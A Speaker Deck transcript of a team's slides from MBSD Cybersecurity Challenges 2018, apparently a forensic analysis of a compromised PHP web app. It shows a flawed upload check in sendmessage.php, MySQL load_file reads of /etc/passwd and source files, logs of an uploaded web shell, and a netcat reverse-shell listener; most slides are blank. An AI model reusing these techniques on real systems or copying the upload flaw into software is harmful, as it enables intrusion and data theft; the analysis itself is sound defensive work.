Upgrade to Pro — share decks privately, control downloads, hide ads and more …

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

8ayac
December 12, 2018

MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

チームIPFactoryとして発表したもの

8ayac

December 12, 2018
Tweet

More Decks by 8ayac

Other Decks in Technology

Transcript

  1. MBSD Cybersecurity Challenges 2018

    View full-size slide







  2. View full-size slide














  3. View full-size slide







  4. View full-size slide










  5. View full-size slide

  6. sendmessage.php



    $prefix = md5(time() . $user->id);
    $tname = $prefix . basename($_FILES["file"]["name"]);
    if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+¥.jpg$/",$tname)) {

    View full-size slide

  7. sendmessage.php (2018/9/21 14:46:48)
    180921 14:39:24 26247 Connect [email protected] on mysql
    180921 14:41:06 26247 Query select load_file('/etc/hosts')
    180921 14:41:12 26247 Query select load_file('/etc/passwd')
    180921 14:42:30 26247 Query select load_file('/etc/issue')
    180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
    180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
    180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
    180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
    180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
    180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
    180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')

    View full-size slide

  8. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >

    View full-size slide

  9. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php

    View full-size slide

  10. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in
    /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a
    blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1

    View full-size slide

  11. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

    View full-size slide

  12. Web Shell (2018/9/21 15:12:46)
    192.168.11.2
    >
    >
    7449f92ea0f26445e89ae968227efaabtest.php
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783
    "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
    Firefox/52.0"

    View full-size slide

  13. (2018/9/21 15:29:02)
    $ nc –lvp 4444
    192.168.11.2
    >

    View full-size slide

  14. (2018/9/21 15:29:02)
    192.168.11.2
    >
    4444/TCPで待受中…

    View full-size slide

  15. (2018/9/21 15:29:02)
    192.168.11.2
    >
    4444/TCPで待受中…

    View full-size slide

  16. (2018/9/21 15:29:02)
    192.168.11.2
    >
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$

    View full-size slide

  17. (2018/9/21 15:29:02)
    192.168.11.2
    >
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$
    192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php
    HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

    View full-size slide




  18. POST

    View full-size slide




  19. POST
    POST

    View full-size slide

  20. ( )



    View full-size slide

  21. POST



    View full-size slide








  22. View full-size slide








  23. View full-size slide







  24. View full-size slide





  25. View full-size slide